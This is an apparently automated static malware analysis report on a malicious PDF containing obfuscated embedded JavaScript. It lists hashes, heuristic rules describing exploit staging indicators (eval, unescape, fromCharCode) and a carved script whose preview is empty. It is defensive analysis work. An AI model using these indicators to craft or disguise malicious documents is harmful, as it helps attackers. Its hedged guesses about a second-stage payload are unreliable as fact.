Malicious PDF — malware analysis report

Static analysis result for SHA-256 2036ea8f6526517f…

Verdict: MALICIOUS

File type: PDF

Size: 6.6 KB  Created: 2008-09-07 22:47:39  Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)  First seen: 2012-07-12
MD5: 6fbd44fdbd6c410776c45d960d255271  SHA-1: 7ed5f497be1c308cd51dbb11d8c4bf4ad2d14cef  SHA-256: 2036ea8f6526517f2de847c0826561ba4811c2b64e4c0d63760098a617f0220f
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of an eval() call within the JavaScript stream (PDF_EVAL) strongly suggests that the script is designed to execute arbitrary code, likely to download and run a second-stage payload. The script itself is obfuscated, as noted by the EXTRACTED_FILE_STATIC_TRIAGE heuristic, making its exact function difficult to determine without further deobfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • JavaScript action (severity: low; 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script stream
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0013_001.js  Kind: pdf-javascript-stream  Source: PDF /JS object 13 at offset 0x38E  Size: 5227 bytes
SHA-256: 91b5664f0e563851bfd1d82e20cf893c0616406387cc26b9ef72fbbcff4ebe0f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script